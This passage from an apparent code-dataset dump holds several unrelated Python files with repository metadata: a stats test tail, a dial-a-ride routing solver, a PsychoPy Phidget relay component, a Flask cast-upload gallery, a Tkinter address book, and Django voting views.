assert round_(baseline.at[\"risk_of_choosing\"]) == 0.138620458\n    assert baseline.at[\"percent_change\"] == None\n\n    assert var1.at[\"variation\"] == \"Variation 1\"\n    assert var1.at[\"per_user\"] == 0.16125\n    assert round_(var1.at[\"chance_to_beat_control\"]) == 0.593436958\n    assert round_(var1.at[\"risk_of_choosing\"]) == 0.076604954\n    assert round_(var1.at[\"percent_change\"]) == -0.007692308\n\n    assert var2.at[\"variation\"] == \"Variation 2\"\n    assert round_(var2.at[\"per_user\"]) == 0.1428\n    assert round_(var2.at[\"chance_to_beat_control\"]) == 0.016533047\n    assert round_(var2.at[\"risk_of_choosing\"]) == 0.702254931\n    assert round_(var2.at[\"percent_change\"]) == 0.076923077\n","repo_name":"rameez-wed/growth-book","sub_path":"packages/stats/tests/test_gbstats.py","file_name":"test_gbstats.py","file_ext":"py","file_size_in_byte":11687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42759998249","text":"import argparse\nimport csv\nfrom typing import List, Dict, Tuple\nfrom parse_requests import Request, getRequests\nfrom gpu import GPU\n\nPoint = Tuple[int, int]\n\n\nclass DARP:\n    def print_config(self):\n        print(f\"number of requests => {self.n}\")\n        print(f\"number of vehicles => {self.m}\")\n        print(f\"Capacity of each vehicle => {self.Q}\")\n        print(f\"area of service => {self.area_of_service} sq-kms\")\n        print(f\"service duration => {self.service_duration} hrs\")\n\n    def get_config(self):\n        return {\n            \"requests\": self.n,\n            \"vehicles\": self.m,\n            \"capacity\": self.Q,\n            \"areaOfService\": self.area_of_service,\n            \"serviceDuration\": self.service_duration\n        }\n\n    def __init__(self, noof_customers: int, service_duration: int, area_of_service: int,\n                 noof_vehicles: int, vehicleCapacity: int) -> None:\n        self.service_duration = service_duration\n        self.noof_customers = noof_customers\n        self.area_of_service = area_of_service\n        self.noof_vehicles = noof_vehicles\n        self.V = [f\"v{v}\" for v in range(self.noof_vehicles)]\n        self.T_route = int(self.service_duration * 60 * 60 * 0.50)  # half of the service duration, converted to seconds\n        # max ride time of each passenger\n        # IDEA: maybe we can do alpha times the time from pickup to dropoff\n        self.T_ride = 0.40 * self.T_route\n        self.requests: List[Request] = getRequests(self.noof_customers, self.service_duration, self.area_of_service)\n        # there are a total of n requests, so n nodes\n        # 1....n\n        # 0 and 2n+1 are the depot\n        self.n = len(self.requests)\n        self.m = self.noof_vehicles\n        self.start_depot = 0\n        self.end_depot = 2 * self.n + 1\n        self.Q = vehicleCapacity  # capacity of each vehicle\n\n        # build coordinates\n        # each request has both pickup and dropoff coordinates\n        # use +req.id as pickup and -req.id as dropoff\n        self.coords: Dict[int, Point] = {}\n        for req in self.requests[1:]:\n            self.coords[req.id] = req.src_point()\n            self.coords[-req.id] = req.dst_point()\n        self.coords[self.start_depot] = self.requests[0].src_point()\n        self.coords[self.end_depot] = self.requests[0].src_point()\n\n        # service time at each node -> in minutes\n        # this is something we came up with\n        self.d: Dict[int, int] = {}\n        for req in self.requests[1:]:\n            self.d[req.id] = 2\n            self.d[-req.id] = 2\n        self.d[self.start_depot] = 2\n        self.d[self.end_depot] = 2\n\n        # load to carry\n        self.q: Dict[int, int] = {}\n        for req in self.requests[1:]:\n            self.q[req.id] = req.load\n            self.q[-req.id] = -req.load\n        self.q[self.start_depot] = 0\n        self.q[self.end_depot] = 0\n\n        \"\"\"\n        [e, l] represents a time window\n        the DAR system should pickup/dropoff 
customers\n        within this time window at the respective node\n        \"\"\"\n        tw = {}\n        # add a 5 min time window\n        offset = int(5 * 60)\n        for req in self.requests[1:]:\n            id = req.id\n            tw[id] = (req.pickup_time, req.pickup_time + offset)\n            tw[-id] = (req.dropoff_time, req.dropoff_time + offset)\n        tw[self.start_depot] = (0, offset)\n        tw[self.end_depot] = (self.T_route, self.T_route + offset)\n        self.tw = tw\n\n        \"\"\" wait times -> for now keep it 150 seconds; there are no wait times for drop nodes\"\"\"\n        self.w = {}\n        self.w[self.start_depot] = self.w[self.end_depot] = 0\n        for req in self.requests:\n            self.w[req.id] = 150\n            self.w[-req.id] = 0\n\n    def e(self, x):\n        return self.tw[x][0]\n\n    def l(self, x):\n        return self.tw[x][1]\n\n    def travel_time(self, one: int, two: int):\n        pone = self.coords[one]\n        ptwo = self.coords[two]\n        return abs(pone[0] - ptwo[0]) + abs(pone[1] - ptwo[1])\n\n    def check_time_feasibility(self, seq: List[int]):\n        # 7-10 => ensure correct arrival, service and departure times\n        # 7 -> for i, j => arrival at j <= start of service at j\n        # departure from i + travel time i-j = arrival time at j <= start of service at j\n        A = {}\n        B = {}\n        D = {}\n        i = seq[0]\n        A[i] = self.e(i)\n        B[i] = A[i] + self.w[i]  # w[i] is zero for dropoff nodes\n        D[i] = B[i] + self.d[i]\n        for i, j in zip(seq, seq[1:]):\n            # there might be some wait time if the node is a pickup\n            A[j] = D[i] + self.travel_time(i, j)\n            B[j] = A[j] + self.w[j]\n            D[j] = B[j] + self.d[j]\n\n        # print(seq)\n        # pprint(A)\n        # pprint(B)\n        # pprint(D)\n        # print(\"\\n\\n\")\n        #\n        # Equation 7\n        for j in seq[1:]:\n            if not A[j] <= B[j]:\n                return False\n\n        # Equation 8 => only for pickup nodes\n        # travel time from the start depot to j must not exceed the arrival at j and the beginning of service at j\n        for i in seq:\n            if i < 0:\n                continue\n            # assume we depart from the depot at time 0\n            t = 0 + self.travel_time(self.start_depot, i)\n            if not (t <= A[i] <= B[i]):\n                return False\n\n        # Equation 9 => only for dropoff\n        for i in seq:\n            if i >= 0:\n                continue\n            if not self.travel_time(i, self.end_depot) <= self.l(self.end_depot):\n                return False\n\n        # Equation 10\n        for i in seq:\n            if not (self.e(i) <= B[i] <= self.l(i)):\n                return False\n\n        # Equation 11\n        for i in seq:\n            if i >= 0:\n                continue\n            # beginning of service at the dropoff minus departure from the pickup should be <= max ride time\n            if not B[i] - D[-i] <= self.T_ride:\n                return False\n\n        # TODO: Equation 12 => seems like we cannot apply this here\n        return True\n\n    def check_load_feasibility(self, seq: List[int]):\n        # CHECKS constraints 5, 6\n        # load when leaving node i\n        y: Dict[int, int] = {}\n        y[seq[0]] = self.q[seq[0]]\n        for prev, cur in zip(seq, seq[1:]):\n            y[cur] = y[prev] + self.q[cur]\n\n        # EQUATION 5, 6\n        for i, j in zip(seq, seq[1:]):\n            if not (y[i] + self.q[j] <= y[j]):\n                return False\n            if not (self.q[i] <= y[i] <= self.Q):\n                return False\n        return True\n\n    def isV(self, x):\n        return x >= self.n  # returns true if the node is a vehicle\n\n    def isR(self, x):\n        return not self.isV(x)  # returns true if the node is a request\n\n    def writeToBenchmarkFile(self, filename, benchmark):\n        print(f\"Writing benchmarks to \", filename)\n        with open(filename, 'a') as f:\n            w = csv.DictWriter(f, fieldnames=list(benchmark.keys()))\n            w.writerow(benchmark)\n\n    def objective_function(self, route, A, B, D, y):\n        # EQ:1 in the paper\n        w1 = 8\n        w2 = 3\n        w3 = 1\n        w4 = 1\n        w5 = 1\n        alpha = 10000\n\n        def c():  # routing costs\n            total = 0\n            for prev, cur in zip(route, route[1:]):\n                total += self.travel_time(prev, cur)\n            return total\n\n        def r():  # excess ride time\n            pickups = 
[x for x in route if x > 0]\n            return sum(B[-i] - D[i] - self.travel_time(i, -i) for i in pickups)\n\n        def l():  # wait time of passengers on board\n            nodes = [x for x in route if x not in [self.start_depot, self.end_depot]]\n            return sum(self.w[i]*(y[i] - self.q[i]) for i in nodes)\n\n        def g():  # route durations\n            # not implemented yet; return 0 so the weighted sum below stays well-defined\n            return 0\n\n        def e():\n            return 0\n\n        def k():\n            return 0\n\n        return w1 * c() + w2 * r() + w3 * l() + w4 * g() + w5 * e() + alpha * k()\n\n    def evaluate_route(self, route: List[int]) -> bool:\n        # Eight-step evaluation\n        # compute the following for each node\n        \"\"\"\n        Departure-prev ...Ride...Arrival..service..wait...Departure\n        \"\"\"\n        def calc(D0):\n            A: Dict[int, int] = {route[0]: D0}  # Arrival time\n            w: Dict[int, int] = {route[0]: 0}  # wait times\n            B: Dict[int, int] = {route[0]: D0}  # Beginning of service\n            D: Dict[int, int] = {route[0]: D0}  # Departure times\n            y: Dict[int, int] = {route[0]: 0}  # load at the time of leaving node x\n            for prev, i in zip(route, route[1:]):\n                # Arrival at i = Departure from previous node + travel time\n                A[i] = D[prev] + self.travel_time(prev, i)\n                # Begin service after the wait-time....\n                # TODO: why do we have to wait here?\n                B[i] = A[i]  # + self.w[i]\n                # after the service -> departure\n                D[i] = B[i] + self.d[i]\n                w[i] = B[i] - A[i]\n                # load after leaving i; since self.q can have negative values for the\n                # dropoff nodes, this statement covers all cases\n                y[i] = y[prev] + self.q[i]\n            return A, w, B, D, y\n\n        A, w, B, D, y = calc(self.e(route[0]))\n        for i in route:\n            if not (B[i] <= self.l(i) and y[i] <= self.Q):\n                return False\n\n        # make the moves\n        for j_idx, j in enumerate(route):\n            Fj = self.forward_slack_time(route, j, w, B, D[route[-1]])\n            w[j] = w[j] + min(Fj, sum(w[p] for p in route[j_idx+1:-1]))\n            B[j] = A[j] + w[j]\n            D[j] = B[j] + self.d[j]\n            for prev, i in zip(route[j_idx:], route[j_idx+1: ]):\n                # TODO: duplicate code\n                A[i] = D[prev] + self.travel_time(prev, i)\n                # Begin service after the wait-time....\n                B[i] = A[i]  # + self.w[i]\n                # after the service -> departure\n                D[i] = B[i] + self.d[i]\n                w[i] = B[i] - A[i]\n            Ti_ride = [A[-abs(i)] - B[abs(i)] for i in route[j_idx+1:-1]]\n            if all([ride <= self.T_ride for ride in Ti_ride]):\n                return True\n        return False\n\n    def forward_slack_time(self, route: List[int], i: int, w: Dict[int, int], B: Dict[int, int], T_Trip: int):\n        # this is basically the cumulative waiting time plus the slack between the end of the time window and the\n        # start of service; the forward slack is the minimum of these over all nodes j\n        # reference: https://logistik.bwl.uni-mainz.de/files/2018/12/LM-2015-01-revised.pdf\n        q = route[-1]\n        res = float('inf')\n        i_idx = route.index(i)\n        for j_idx in range(i_idx, len(route)):\n            # j is some point between i and q\n            # calculate all the wait times between i and j\n            wait_times = [w[route[x]] for x in range(i_idx, j_idx + 1)]\n            tw_slack = self.l(route[j_idx]) - B[route[j_idx]]\n            res = min(res, sum(wait_times) + tw_slack)\n        return res\n\n    def start(self):\n        pass\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('-n', '--noof_customers', required=True, type=int, help='noof customers')\n    parser.add_argument('-d', '--service_duration', type=int, help='service duration', required=True)\n    parser.add_argument('-a', '--area_of_service', type=int, help='area of service', required=True)\n    parser.add_argument('-v', '--noof_vehicles', required=True, type=int, help='noof vehicles')\n    parser.add_argument('-Q', '--vehicle_capacity', required=True, type=int, help='vehicle capacity')\n    args = 
parser.parse_args()\n    darp = DARP(args.noof_customers, args.service_duration, args.area_of_service, args.noof_vehicles,\n                args.vehicle_capacity)\n    benchmarking = darp.get_config()\n    gpu = GPU(darp)\n    init_solution = gpu.construction_kernel()\n    print(init_solution)\n    solution = gpu.local_search_kernel(init_solution)\n    print(solution[1])\n    print(solution[0])\n    print('done')\n\n","repo_name":"nraghuveer/Dail-A-Ride-TabuSearch-CPU","sub_path":"src/darp.py","file_name":"darp.py","file_ext":"py","file_size_in_byte":11971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13356450310","text":"from psychopy.experiment.components import BaseComponent, Param, _translate\nfrom psychopy import prefs, logging\n\n#Modeled after qmix/pump\n\nfrom pathlib import Path\nfrom psychopy.localization import _localized as __localized\n_localized = __localized.copy()\n\n_localized.update({'channelList': _translate('Channel List'),\n                   'serialNumber': _translate('Serial Number'),\n                   'reversedRelay': _translate('Reversed Relay'),\n                   'syncToScreen': _translate('Sync to screen')\n                   })\n\nclass PhidgetRelayComponent(BaseComponent):\n    \"\"\"Operate a Phidget Relay (0/0/4) or (0/0/8)\"\"\"\n    targets = ['PsychoPy']\n    categories = ['I/O']\n    iconFile = Path(__file__).parent / 'phidgets.png'\n    tooltip = _translate('Phidget: control operant chamber events using (a) relay(s)')\n\n    def __init__(self, exp, parentName, name='phidgetRelay',\n                 startType='time (s)', startVal=0.0,\n                 stopType='duration (s)', stopVal=3.0,\n                 startEstim='', durationEstim='',\n                 channelList='',\n                 serialNumber='',\n                 reversedRelay=False,\n                 syncToScreen=True):\n\n        super(PhidgetRelayComponent, self).__init__(\n            exp, parentName, name,\n            startType=startType, startVal=startVal,\n            stopType=stopType, stopVal=stopVal,\n            startEstim=startEstim, durationEstim=durationEstim)\n\n        self.type = 'PhidgetRelay'\n        self.url = 'https://www.psychopy.org/builder/components/phidget.html'\n\n        self.exp.requireImport(importName='PhidgetOutputComponent',\n                               importFrom='psychopy.hardware')\n\n        # Order in which the user-settable parameters will be displayed\n        # in the component's properties window.\n        self.order += ['syncToScreen',  # Basic tab\n                       'channelList', 'serialNumber', 'reversedRelay',  # Hardware tab\n                       ]\n\n        self.params['channelList'] = Param(\n            channelList, categ='Hardware',\n            valType='list', inputType=\"single\",\n            hint=_translate('The list of channels controlled by this component'),\n            label=_localized['channelList'])\n\n        self.params['serialNumber'] = Param(\n            serialNumber, categ='Hardware',\n            valType='num', inputType=\"int\",\n            hint=_translate('Serial number for your Phidget Output relay (leave empty if only one Phidget attached to PC)'),\n            label=_localized['serialNumber'])\n\n        self.params['reversedRelay'] = Param(\n            reversedRelay, categ='Hardware',\n            valType='bool', inputType=\"bool\", allowedVals=[True, False],\n            hint=_translate('Set reversed if you want the relay to start on and turn off for the indicated duration'),\n            label=_localized['reversedRelay'])\n\n        self.params['syncToScreen'] = Param(\n            syncToScreen, valType='bool', inputType=\"bool\", categ='Basic',\n            allowedVals=[True, False],\n            hint=_translate('Sync relay events to the screen refresh'),\n            label=_localized['syncToScreen'])\n\n    def writeRunOnceInitCode(self, buff):\n        code = ('# Initialize relays\\n'\n                '%(name)s = PhidgetOutputComponent(channelList = %(channelList)s, '\n                'serialNumber = %(serialNumber)s, '\n                'reversedRelay = %(reversedRelay)s)\\n'\n                % 
self.params )\n buff.writeOnceIndentedLines(code)\n\n def writeRoutineStartCode(self, buff):\n \"\"\"Write the code that will be called at the start of the routine.\n \"\"\"\n\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n def writeFrameCode(self, buff):\n \"\"\"Write the code that will be called every frame.\n \"\"\"\n\n\n buff.writeIndented(\"# *%s* updates\\n\" % (self.params['name']))\n self.writeStartTestCode(buff)\n buff.writeIndented(\"%(name)s.status = STARTED\\n\" % self.params)\n\n if self.params['syncToScreen'].val:\n code = ('\\n'\n 'win.callOnFlip(%(name)s.closeRelay)\\n'\n % self.params)\n else:\n code = ('\\n'\n '%(name)s.closeRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n buff.setIndentLevel(-1, relative=True)\n\n # Test for stop (only if there was some setting for duration or\n # stop).\n if self.params['stopVal'].val not in ['', None, -1, 'None']:\n self.writeStopTestCode(buff)\n buff.writeIndented(\"%(name)s.status = FINISHED\\n\" % self.params)\n\n if self.params['syncToScreen'].val:\n code = ('\\n'\n 'win.callOnFlip(%(name)s.openRelay)\\n'\n % self.params)\n else:\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n buff.setIndentLevel(-2, relative=True)\n\n\n def writeRoutineEndCode(self, buff):\n #Leave the relay in the default state\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n # get parent to write code too (e.g. store onset/offset times)\n super().writeRoutineEndCode(buff)\n\n def writeExperimentEndCode(self, buff):\n #Leave the relay in the default state\n code = ('\\n'\n '%(name)s.openRelay()\\n'\n % self.params)\n\n buff.writeIndentedLines(code)\n\n # get parent to write code too (e.g. 
store onset/offset times)\n        super().writeExperimentEndCode(buff)","repo_name":"maqadri/psychopy-phidgets","sub_path":"psychopy_phidgets/component/phidgets.py","file_name":"phidgets.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39778431761","text":"from flask import Flask, render_template, request, send_from_directory\nfrom werkzeug.utils import secure_filename\nfrom datetime import datetime\nimport os\nimport json\nfrom uuid import uuid4\n\n\napp = Flask(__name__)\nCastsFile = os.path.join(app.root_path, 'static','castinfo','casts.json')\n\nif os.path.isfile(CastsFile):\n\ttry:\n\t\twith open(CastsFile) as casts:\n\t\t\tCastCache = dict(json.loads(casts.read()))\n\texcept:\n\t\tCastCache = {}\n\nelse:\n\tprint('No casts available!')\n\tCastCache = {}\n\nprint(CastCache)\n\n@app.route(\"/favicon.ico\")\ndef favicon():\n\treturn send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico',mimetype='image/vnd.microsoft.icon')\n\n@app.route('/', methods = ['GET','POST'])\ndef index():\n\tif request.method == 'GET':\n\t\treturn render_template('index.html', ASCIINEMAS = CastCache)\n\telse:\n\t\tprint(request.files)\n\t\t\n\t\tfile = request.files['file']\n\t\ttitle = request.form.get('title','N.A.')\n\t\tdescription = request.form.get('description','N.A.')\n\t\tfile_uuid = str(uuid4()) + '.cast'\n\t\tfile.save(os.path.join(app.root_path, 'static','cast', file_uuid))\n\t\tCastCache.update({file_uuid:{\"Title\":title,\"Description\":description,\"Date\":str(datetime.now())}})\n\t\twith open(CastsFile,'w') as casts:\n\t\t\tjson.dump(CastCache,casts)\n\t\treturn 'OK'\n\n#r = requests.post(url, files=files, data=values)\n\nif __name__ == '__main__':\n\tapp.run(host = '0.0.0.0', port = 8000)","repo_name":"r3ap3rpy/asciinema-gallery","sub_path":"asciigallery.py","file_name":"asciigallery.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"11874026184","text":"import tkinter as tk\nfrom tkinter import ttk\nimport tkinter.messagebox as msgBox\nfrom typing import Callable\n\n\nclass ViewTab1(ttk.Frame):\n    def __init__(self, root):\n        super().__init__()\n        root.add(self, text=\"Edit\")\n        self.root = root\n        self.currentId = None  # trying to keep track of the instance\n\n        self.columnconfigure(0, weight=1)\n        self.columnconfigure(1, weight=1)\n        self.columnconfigure(2, weight=1)\n\n        self.labelFont = (\"Arial\", 14)\n        self.entryFont = (\"Arial\", 14)\n        self.padding = {\"padx\": 5, \"pady\": 5}\n\n        # labels:\n        self.labelFirstName = ttk.Label(self, text=\"First Name:\", font=self.labelFont)\n        self.labelFirstName.grid(column=0, row=1, sticky=tk.W, **self.padding)\n\n        self.labelLastName = ttk.Label(self, text=\"Last Name:\", font=self.labelFont)\n        self.labelLastName.grid(column=0, row=2, sticky=tk.W, **self.padding)\n\n        self.labelbirthday = ttk.Label(self, text=\"Birthday:\", font=self.labelFont)\n        self.labelbirthday.grid(column=0, row=3, sticky=tk.W, **self.padding)\n\n        self.labelStreet = ttk.Label(self, text=\"Street:\", font=self.labelFont)\n        self.labelStreet.grid(column=0, row=4, sticky=tk.W, **self.padding)\n\n        self.labelZip = ttk.Label(self, text=\"ZIP:\", font=self.labelFont)\n        self.labelZip.grid(column=0, row=5, sticky=tk.W, **self.padding)\n\n        self.labelCity = ttk.Label(self, text=\"City:\", font=self.labelFont)\n        self.labelCity.grid(column=0, row=6, sticky=tk.W, **self.padding)\n\n        
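# the remaining address fields repeat the same label + grid pattern\n        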
self.labelCountry = ttk.Label(self, text=\"Country:\", font=self.labelFont)\n self.labelCountry.grid(column=0, row=7, sticky=tk.W, **self.padding)\n\n self.labelEmail = ttk.Label(self, text=\"Email:\", font=self.labelFont)\n self.labelEmail.grid(column=0, row=8, sticky=tk.W, **self.padding)\n\n self.labelPhone = ttk.Label(self, text=\"Phone:\", font=self.labelFont)\n self.labelPhone.grid(column=0, row=9, sticky=tk.W, **self.padding)\n\n # entries:\n self.entryFirstName = ttk.Entry(self, font=self.entryFont)\n self.entryFirstName.grid(column=2, row=1, sticky=tk.E, **self.padding)\n\n self.entryLastName = ttk.Entry(self, font=self.entryFont)\n self.entryLastName.grid(column=2, row=2, sticky=tk.E, **self.padding)\n\n self.entryBirthday = ttk.Entry(self, font=self.entryFont)\n self.entryBirthday.grid(column=2, row=3, sticky=tk.E, **self.padding)\n\n self.entryStreet = ttk.Entry(self, font=self.entryFont)\n self.entryStreet.grid(column=2, row=4, sticky=tk.E, **self.padding)\n\n self.entryZip = ttk.Entry(self, font=self.entryFont)\n self.entryZip.grid(column=2, row=5, sticky=tk.E, **self.padding)\n\n self.entryCity = ttk.Entry(self, font=self.entryFont)\n self.entryCity.grid(column=2, row=6, sticky=tk.E, **self.padding)\n\n self.entryCountry = ttk.Entry(self, font=self.entryFont)\n self.entryCountry.grid(column=2, row=7, sticky=tk.E, **self.padding)\n\n self.entryEmail = ttk.Entry(self, font=self.entryFont)\n self.entryEmail.grid(column=2, row=8, sticky=tk.E, **self.padding)\n\n self.entryPhone = ttk.Entry(self, font=self.entryFont)\n self.entryPhone.grid(column=2, row=9, sticky=tk.E, **self.padding)\n\n # buttons:\n self.buttonSubmit = tk.Button(self, text=\"Submit\", width=15)\n self.buttonSubmit.grid(column=2, row=10, sticky=tk.SE, **self.padding)\n\n self.buttonClear = tk.Button(self, text=\"Clear\", width=15)\n self.buttonClear.grid(column=2, row=10, sticky=tk.S, **self.padding)\n\n def hook_controls(self, controller):\n self.controller = controller\n self.buttonClear.configure(command=self.button_clear)\n self.buttonSubmit.configure(command=self.button_submit)\n\n def _load_single(self, id):\n self._clear_all_entries()\n address = self.controller.load_single_address(id)\n\n # self.entryFirstName.delete(0, \"end\")\n self.currentId = address.id\n self.entryFirstName.insert(0, (address.firstName or \"\"))\n self.entryLastName.insert(0, (address.lastName or \"\"))\n self.entryBirthday.insert(0, (address.birthday or \"\"))\n self.entryStreet.insert(0, (address.street or \"\"))\n self.entryCity.insert(0, (address.city or \"\"))\n self.entryZip.insert(0, (address.zip or \"\"))\n self.entryCountry.insert(0, (address.country or \"\"))\n self.entryEmail.insert(0, (address.email or \"\"))\n self.entryPhone.insert(0, (address.phone or \"\"))\n\n def button_submit(self, event: tk.Event = None):\n print(\"button submit\")\n\n if self.currentId is not None:\n answer = msgBox.askquestion(\n title=\"Update\",\n message=f\"Do you want to change the existing id { self.currentId }?\",\n icon=\"warning\",\n )\n if answer == \"no\":\n return\n\n input = {\n \"id\": self.currentId,\n \"firstName\": str.strip(self.entryFirstName.get()) or None,\n \"lastName\": str.strip(self.entryLastName.get()) or None,\n \"birthday\": str.strip(self.entryBirthday.get()) or None,\n \"street\": str.strip(self.entryStreet.get()) or None,\n \"zip\": str.strip(self.entryZip.get()) or None,\n \"city\": str.strip(self.entryCity.get()) or None,\n \"country\": str.strip(self.entryCountry.get()) or None,\n \"email\": 
str.strip(self.entryEmail.get()) or None,\n            \"phone\": str.strip(self.entryPhone.get()) or None,\n        }\n\n        if self.controller.submit_input(input):\n            msgBox.showinfo(title=\"Success\", message=\"Input was accepted\")\n            self._clear_all_entries()\n        else:\n            msgBox.showerror(title=\"Nope\", message=\"Input cannot be accepted\")\n\n    def button_clear(self):\n        self._clear_all_entries()\n\n    def _clear_all_entries(self):\n        self.currentId = None\n        for widget in self.winfo_children():\n            if isinstance(widget, tk.Entry):\n                widget.delete(0, tk.END)\n\n\nclass ViewTab2(ttk.Frame):\n    def __init__(self, root):\n        super().__init__()\n        root.add(self, text=\"View\")\n\n        # self.columnconfigure(0, weight=3)\n        # self.columnconfigure(1, weight=1)\n        self.padding = {\"padx\": 5, \"pady\": 5}\n\n        # create Treeview:\n        self.cols = [\n            \"id\",\n            \"firstName\",\n            \"lastName\",\n            \"birthday\",\n            \"street\",\n            \"zip\",\n            \"city\",\n            \"country\",\n            \"email\",\n            \"phone\",\n        ]\n\n        self.myTable = ttk.Treeview(\n            self, columns=self.cols, show=\"headings\", height=15, selectmode=\"browse\"\n        )\n\n        # set headings:\n        for col in self.cols:\n            self.myTable.column(col, width=75)\n            self.myTable.heading(col, text=col)\n\n        self.myTable.grid(row=0, column=0, columnspan=2)\n\n        # buttons:\n        self.buttonDelete = tk.Button(self, text=\"Delete\", width=15)\n        self.buttonDelete.grid(row=2, column=1, sticky=tk.S, **self.padding)\n\n        self.buttonClose = tk.Button(self, text=\"Close\", width=15, command=exit)\n        self.buttonClose.grid(\n            row=2, column=1, columnspan=2, sticky=tk.SE, **self.padding\n        )\n\n        # scrollbars:\n        ys = ttk.Scrollbar(self, orient=tk.VERTICAL, command=self.myTable.yview)\n        self.myTable[\"yscrollcommand\"] = ys.set\n        ys.grid(row=0, column=2, sticky=(tk.N, tk.S, tk.W))\n\n        xs = ttk.Scrollbar(self, orient=tk.HORIZONTAL, command=self.myTable.xview)\n        self.myTable[\"xscrollcommand\"] = xs.set\n        xs.grid(row=1, column=0, columnspan=2, sticky=(tk.W, tk.E, tk.N))\n\n    def hook_controls(self, controller):\n        self.controller = controller\n        self.myTable.bind(\"<Double-1>\", self._dclick_event)\n        self.buttonDelete.configure(command=self.button_delete)\n        # self.myTable.bind(\"<<TreeviewSelect>>\", self.tree_click_event)\n        for col in self.cols:\n            self.myTable.heading(\n                col,\n                # lambdas are a pretty useful alternative to callback functions\n                command=lambda _col=col: self._sort_column(_col, False),\n            )\n\n    def _sort_column(self, column, reverse):\n        print(f\"sorting by { column }\")\n        ids = self.myTable.get_children(\"\")\n        # check column data type. 
This is ugly..\n        if self.myTable.set(ids[0], column).isnumeric():\n            columnItems = [(int(self.myTable.set(id, column)), id) for id in ids]\n        else:\n            columnItems = [(self.myTable.set(id, column), id) for id in ids]\n        # rearrange items in sorted positions\n        columnItems.sort(reverse=reverse)\n        for position, (value, id) in enumerate(columnItems):\n            self.myTable.move(id, \"\", position)\n        # flip the sort direction for the next click on this heading\n        self.myTable.heading(\n            column, command=lambda _col=column: self._sort_column(_col, not reverse)\n        )\n\n    def hook_callback(self, callback: Callable):\n        self.callback_load = callback\n\n    def _dclick_event(self, event: tk.Event = None):\n        item = self.myTable.selection()\n        if len(item) != 0:\n            clickedItem = self.myTable.item(*item)\n            id = clickedItem[\"values\"][0]\n            print(f\"double-clicked on id {id}\")\n            self.callback_load(id)\n\n    def initialize(self):\n        self._show_all()\n\n    def _show_all(self):\n        # remove existing items:\n        for item in self.myTable.get_children():\n            self.myTable.delete(item)\n\n        # populate freshly:\n        addresses = self.controller.load_all_addresses()\n        # addresses.sort(key=lambda x: x.lastName)\n        for address in addresses:\n            displayable = [\n                address.id,\n                address.firstName or \"\",\n                address.lastName or \"\",\n                address.birthday or \"\",\n                address.street or \"\",\n                address.city or \"\",\n                address.zip or \"\",\n                address.country or \"\",\n                address.email or \"\",\n                address.phone or \"\",\n            ]\n            self.myTable.insert(parent=\"\", index=\"end\", values=displayable)\n\n    def button_delete(self):\n        print(\"button delete\")\n        item = self.myTable.selection()\n        if len(item) != 0:\n            clickedItem = self.myTable.item(*item)\n            id = clickedItem[\"values\"][0]\n\n            answer = msgBox.askquestion(\n                title=\"Delete\",\n                message=f\"Are you sure you want to delete id { id }?\",\n                icon=\"warning\",\n            )\n            if answer == \"yes\":\n                self.controller.delete_single_address(id)\n                self._show_all()\n\n\nclass View:\n    def __init__(self, controller):\n        self.controller = controller\n        self.root = controller.master\n        # self.root.geometry(\"800x400\")\n        self.padding = {\"padx\": 5, \"pady\": 5}\n\n        self.labelTitle = tk.Label(self.root, text=\"Address Book\", font=(\"Calibri\", 32))\n        self.labelTitle.grid(row=0, **self.padding)\n\n        self.labelInstructions = tk.Label(\n            self.root, text=\"Double-click on an existing entry in order to modify it.\"\n        )\n        self.labelInstructions.grid(row=1, **self.padding)\n\n        # Create notebook with tabs\n        self.tabControl = ttk.Notebook(self.root)\n        self.tab0 = ViewTab1(self.tabControl)\n        self.tab1 = ViewTab2(self.tabControl)\n\n        self.tabControl.grid(row=2, sticky=tk.W, **self.padding)\n\n        self.tab0.hook_controls(self.controller)\n        self.tab1.hook_controls(self.controller)\n        self.tab1.hook_callback(self.delegate_load)\n\n        # Events:\n        self.tabControl.bind(\"<<NotebookTabChanged>>\", self.switch_handler)\n        # self.root.bind(\"<Return>\", self.enter_key) # could be bound to submit button\n\n    def switch_handler(self, event: tk.Event = None):\n        tabName = self.tabControl.tab(event.widget.select(), \"text\")\n        print(f\"switching to tab { tabName }\")\n        tabIndex = event.widget.index(\"current\")\n\n        if tabIndex == 1:\n            self.tab1.initialize()\n\n    def delegate_load(self, id: int):\n        self.tabControl.select(0)\n        self.tab0._load_single(id)\n\n    # def enter_key(self, event: tk.Event = None):\n    #     print(\"enter 
key\")\n","repo_name":"woodly0/AddressBook_TkinterMVC","sub_path":"gui/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":12442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1042835262","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, redirect\n\nfrom ..models import Question, Answer\n\n@login_required(login_url='common:login')\ndef vote_question(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n if request.user == question.author:\n messages.error(request, '본인이 작성한 글은 추천할 수 없습니다.')\n else:\n question.voter.add(request.user)\n return redirect('pybo:detail', question_id=question.id)\n\n@login_required(login_url='common:login')\ndef vote_answer(request, answer_id):\n answer = get_object_or_404(Answer, pk=answer_id)\n if request.user == answer.author:\n messages.error(request, '본인이 작성한 댓글은 추천할 수 없습니다.')\n else:\n answer.voter.add(request.user)\n return redirect('pybo:detail', 